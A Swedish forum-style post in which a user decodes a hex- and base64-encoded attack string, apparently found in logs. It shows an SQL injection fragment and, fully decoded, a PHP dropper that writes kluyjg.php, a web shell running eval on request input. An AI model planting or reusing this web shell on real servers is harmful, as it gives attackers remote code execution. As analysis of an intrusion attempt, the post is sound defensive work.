Jag antog att det var UTF-8 som var kodat i hexadecimal så då blev det följande hos https://onlinetools.com/utf8/convert-hexadecimal-to-utf8:
2d312720554e494f4e2f2a
=
-1' UNION/*
7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c
735a56397764585266593239756447567564484d6f4a32747364586c715a793577
6148416e4c4363385033426f6343426a6247467a63794248595530784d475a424e
53423749484231596d78705979426d6457356a64476c766269426658324e76626e
4e30636e566a6443676b5344647464545970657942415a585a68624367694c7970
61527a5636613235535a6c4e724b6938694c6952494e3231314e69346949696b37
49483139626d563349456468545445775a6b45314b435266556b56525655565456
4673784d6a4e644b54732f506963702729293b2f2f7d787878
=
{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMo
J2tsdXlqZy5waHAnLCc8P3BocCBjbGFzcyBHYU0xMGZBNSB7IHB
1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkSDdtdTYpeyBAZXZ
hbCgiLypaRzV6a25SZlNrKi8iLiRIN211Ni4iIik7IH19bmV3IEdhTTEw
ZkE1KCRfUkVRVUVTVFsxMjNdKTs/Picp'));//}xxx
Sedan användes https://www.base64decode.org/ för att avkoda base64:
ZmlsZV9wdXRfY29udGVudHMoJ2tsdXlqZy5waHAnLCc8P3BocCBjbGFzcy
BHYU0xMGZBNSB7IHB1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkSD
dtdTYpeyBAZXZhbCgiLypaRzV6a25SZlNrKi8iLiRIN211Ni4iIik7IH19bmV3
IEdhTTEwZkE1KCRfUkVRVUVTVFsxMjNdKTs/Picp
=
file_put_contents('kluyjg.php','<?php class GaM10fA5
{ public function __construct($H7mu6)
{ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST[123]);?>')
Så denna PHP-kod:
file_put_contents('kluyjg.php','
<?php
class GaM10fA5
{
public function __construct($H7mu6)
{
@eval("/*ZG5zknRfSk*/".$H7mu6."");
}
}
new GaM10fA5($_REQUEST[123]);?>');
Base64 på den utkommenterade base64-strängen inuti eval-funktionen:
ZG5zknRfSk = dnst_J
Längre än så kom jag inte!
Mvh,
WKF.